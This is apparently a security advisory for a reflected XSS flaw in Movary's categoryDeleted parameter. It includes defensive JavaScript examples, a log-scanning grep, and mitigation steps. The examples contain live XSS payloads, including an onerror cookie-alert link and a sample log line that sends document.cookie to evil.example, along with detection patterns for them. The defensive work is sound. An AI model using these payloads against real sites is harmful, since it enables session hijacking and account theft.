Platform
javascript
Component
movary
Fixed in
0.70.1
CVE-2026-23840 is a Cross-Site Scripting (XSS) vulnerability in Movary, a web application for tracking and rating movies, rated CRITICAL with a CVSS score of 9.3. It lets an attacker run script in a victim's browser in the origin of the Movary instance, which can expose that user's session and data. The advisory text states that versions prior to 0.70.0 are affected and that 0.70.0 contains the patch; the fixed-in field of this entry lists 0.70.1, so 0.70.1 or later is safe under either reading.
The flaw is a reflected XSS: the value of the ?categoryDeleted= query parameter is written into the page without being validated or HTML-encoded. An attacker crafts a URL whose categoryDeleted value contains markup or script and gets a logged-in user to open it (a link in an e-mail or chat message, for example); the payload then executes in that user's browser with the same origin as the Movary site. From there the script can read what the page can read, send the user to a phishing site, perform actions in the application as that user, or alter what the page displays. Reading the session cookie directly only works if it lacks the HttpOnly flag, but actions carried out through the hijacked page do not depend on that. The impact is confined to users who open the crafted link, but for them it can mean a compromised account and access to whatever that account holds.
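The following is an added example, not code from the advisory or from the Movary project. It shows the reflected-XSS pattern described above (the decoded ?categoryDeleted= value written straight into markup) beside a hardened version that HTML-encodes the value first. The banner markup, the function names and the /categories path are assumptions; only the parameter name categoryDeleted comes from the advisory.

```javascript
// Added example; not Movary's code. Shows the reflected-XSS pattern the
// advisory describes (raw ?categoryDeleted= value written into markup) next
// to a hardened version. The banner markup, path and function names are
// hypothetical; only the parameter name comes from the advisory.

// Encodes the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reads ?categoryDeleted= from an absolute URL or a "/path?query" string.
function categoryDeletedParam(url) {
  return new URL(url, 'http://localhost').searchParams.get('categoryDeleted');
}

// VULNERABLE: the decoded value is concatenated straight into the page.
// A value such as "><img src=x onerror=alert(1)> closes the attribute and the
// tag, and the browser runs the injected onerror handler.
function renderBannerUnsafe(url) {
  const name = categoryDeletedParam(url);
  if (name === null) return '';
  return `<div class="alert" data-category="${name}">Category "${name}" was deleted</div>`;
}

// HARDENED: the value is HTML-encoded before it is placed into the markup,
// so the same payload is displayed as text instead of being parsed as a tag.
function renderBannerSafe(url) {
  const name = categoryDeletedParam(url);
  if (name === null) return '';
  const safe = escapeHtml(name);
  return `<div class="alert" data-category="${safe}">Category "${safe}" was deleted</div>`;
}

// Constructed attacker link: the payload is URL-encoded as a browser would send it.
const ATTACK_URL = '/categories?categoryDeleted=' +
  encodeURIComponent('"><img src=x onerror=alert(document.cookie)>');

console.log('unsafe:', renderBannerUnsafe(ATTACK_URL));
console.log('safe  :', renderBannerSafe(ATTACK_URL));
```

Run it with `node` and compare the two lines: the unsafe output contains a live `<img ... onerror=...>` element inside the div, the safe output contains the same characters as `&quot;&gt;&lt;img ...&gt;`, which the browser renders as literal text. Encoding at the point of output, in the context the value lands in (here HTML text and a double-quoted attribute), is the fix; filtering the input for the word "script" is not.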
CVE-2026-23840 was publicly disclosed on 2026-01-19. No public proof-of-concept (PoC) code has been released as of this writing, but reflected XSS is simple to weaponise once the injection point is known, so the absence of a PoC offers little protection. The CVSS score is 9.3 (CRITICAL). The EPSS score of 0.13% (32nd percentile) indicates a low predicted probability of exploitation in the wild, and the vulnerability is not currently listed in the CISA KEV catalog.
Anyone running a Movary instance on a vulnerable version is affected, whether it serves a single person or several user accounts. The attack needs a victim to open an attacker-supplied link while logged in, so instances reachable from the internet and used by more than one person carry the higher risk; the hosting environment itself does not change how exploitable the flaw is.
• javascript: Inspect the code that renders the ?categoryDeleted= parameter (the server-side template or client-side script that builds the notice) for places where the raw value is concatenated into HTML or assigned to innerHTML without encoding.
• generic web: Monitor access logs for requests whose ?categoryDeleted= value contains markup or script. Payloads arrive URL-encoded, so match on the encoded forms as well. Example (extended regex; in basic regex `\(` opens a group and the original `alert\(` fails with "Unmatched ( or \("):
grep -iE 'categoryDeleted=[^ &]*(<|%3C|alert\(|alert%28|onerror|javascript:)' /var/log/apache2/access.log
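The grep above catches the obvious cases. The following added example, which is not part of the advisory or of Movary, does the same check more carefully over constructed combined-format access log lines: it parses the request target, URL-decodes every categoryDeleted value (decoding a second time to catch double-encoded payloads) and flags values that carry tags, event handlers or script. The log lines and the /categories path are constructed for the demonstration.

```javascript
// Added example, not from the advisory or the Movary project: scan combined
// log-format lines for ?categoryDeleted= values that contain markup or script
// once URL-decoded. The log lines below are constructed sample data.

const SAMPLE_LOG = [
  '10.0.0.5 - - [19/Jan/2026:10:01:02 +0000] "GET /categories?categoryDeleted=Drama HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [19/Jan/2026:10:02:11 +0000] "GET /categories?categoryDeleted=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5300 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [19/Jan/2026:10:02:30 +0000] "GET /categories?categoryDeleted=%3Cscript%3Efetch(%27https://evil.example/%3F%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 5300 "-" "curl/8.0"',
  '10.0.0.7 - - [19/Jan/2026:10:03:00 +0000] "GET /movies?search=alert HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
];

// Signs of an attempt to break out into markup or script after decoding.
const SUSPICIOUS = /<\s*\/?\s*[a-z]|\bon[a-z]+\s*=|javascript:|alert\s*\(|document\.cookie|eval\s*\(/i;

// Pulls the request target out of a combined-format line and returns every
// categoryDeleted value, decoded. URLSearchParams decodes once; the extra
// decodeURIComponent catches %2522-style double encoding.
function extractCategoryDeleted(line) {
  const m = line.match(/"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP\/[\d.]+"/);
  if (!m) return [];
  let url;
  try { url = new URL(m[1], 'http://localhost'); } catch { return []; }
  return url.searchParams.getAll('categoryDeleted').map(v => {
    try { return decodeURIComponent(v); } catch { return v; }
  });
}

// Returns the suspicious hits as [{ line, value }].
function findXssAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    for (const value of extractCategoryDeleted(line)) {
      if (SUSPICIOUS.test(value)) hits.push({ line, value });
    }
  }
  return hits;
}

for (const h of findXssAttempts(SAMPLE_LOG)) {
  console.log('suspicious categoryDeleted value:', h.value);
}
```

Decoding before matching is the important part: a rule that only looks for `<script` in the raw line misses `%3Cscript` and `%253Cscript`, and a rule that only looks at the encoded form misses a payload the client sent unencoded. The fourth line shows why the match is scoped to the parameter rather than the whole line: a search for the word "alert" on another endpoint is not an attack.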
Exploit status
EPSS
0.13% (32nd percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-23840 is to upgrade Movary to a fixed release: 0.70.0 or later according to the advisory text, 0.70.1 according to this entry's fixed-in field, so 0.70.1 or later is safe under either reading. If upgrading is not immediately feasible, a Web Application Firewall rule that blocks requests whose categoryDeleted value contains angle brackets, quotes or javascript: (in raw and URL-encoded form) is a stopgap rather than a fix, since encoding variations can slip past such rules. Setting the session cookie with the HttpOnly flag and serving a Content-Security-Policy that disallows inline script limit what a successful injection can do. Longer term, HTML-encode every user-supplied value at the point where it is written into a page. After upgrading, confirm the fix by requesting the page with a harmless marker in ?categoryDeleted= (for example "><test) and checking that the response contains it only in encoded form (&quot;&gt;&lt;test&gt;), never as live markup.
Update Movary to version 0.70.0 or later. That version fixes the Cross-Site Scripting (XSS) vulnerability by validating the `categoryDeleted` parameter correctly. The update prevents attackers from executing malicious scripts in your browser.
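The post-upgrade check described above, as an added example that is not part of the advisory or of Movary: send an inert canary in ?categoryDeleted= and classify how the response reflects it. The /categories path, the canary string and the function names are assumptions; adjust the path to whichever page in your deployment displays the deleted-category notice.

```javascript
// Added example, not from the advisory or from Movary: classify how a page
// reflects an inert canary placed in ?categoryDeleted=. The /categories path
// and the canary are assumptions for the demonstration.

const CANARY = '"><mvcanary>';   // inert: no script, no event handler, no real tag

// 'vulnerable' if the canary appears as live markup, 'encoded' if it appears
// only HTML-encoded (any of the usual encodings of the double quote), and
// 'absent' if the page does not reflect the parameter at all.
function classifyReflection(body) {
  if (body.includes(CANARY)) return 'vulnerable';
  const encodedForms = [
    '&quot;&gt;&lt;mvcanary&gt;',
    '&#34;&gt;&lt;mvcanary&gt;',
    '&#x22;&gt;&lt;mvcanary&gt;',
  ];
  if (encodedForms.some(e => body.includes(e))) return 'encoded';
  return 'absent';
}

// Builds the check URL; URLSearchParams percent-encodes the canary for us.
function canaryUrl(baseUrl) {
  const u = new URL('/categories', baseUrl);
  u.searchParams.set('categoryDeleted', CANARY);
  return u.toString();
}

// Live check against a running instance (Node 18+ has a global fetch).
// Pass the session cookie if the page requires login, e.g.
//   checkDeployment('https://movary.example', 'id=...').then(console.log)
async function checkDeployment(baseUrl, cookieHeader) {
  const res = await fetch(canaryUrl(baseUrl), {
    headers: cookieHeader ? { cookie: cookieHeader } : {},
    redirect: 'manual',
  });
  return classifyReflection(await res.text());
}

// Constructed response bodies showing the two outcomes that matter.
const BODY_BEFORE_FIX = '<div class="alert">Category ""><mvcanary>" was deleted</div>';
const BODY_AFTER_FIX  = '<div class="alert">Category "&quot;&gt;&lt;mvcanary&gt;" was deleted</div>';

console.log('before fix:', classifyReflection(BODY_BEFORE_FIX));
console.log('after fix :', classifyReflection(BODY_AFTER_FIX));
```

An 'absent' result is not a pass: it means the page you requested does not reflect the parameter, so either the path is wrong or the notice is shown somewhere else. Repeat the check against the page that actually renders the deleted-category message, and with a logged-in session if that page requires one.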
CVE-2026-23840 is a critical Cross-Site Scripting (XSS) vulnerability in Movary versions prior to 0.70.0, allowing attackers to inject malicious scripts.
You are affected if you run a Movary version prior to 0.70.0. Upgrade to 0.70.0 or later (0.70.1 according to this entry's fixed-in field) to remove the risk.
Upgrade Movary to version 0.70.0 or later. A WAF rule that filters suspicious categoryDeleted values is only a temporary measure.
There are no confirmed reports of active exploitation at this time, but the vulnerability's severity warrants immediate attention.
Refer to the Movary project's official website or GitHub repository for the latest security advisories and release notes.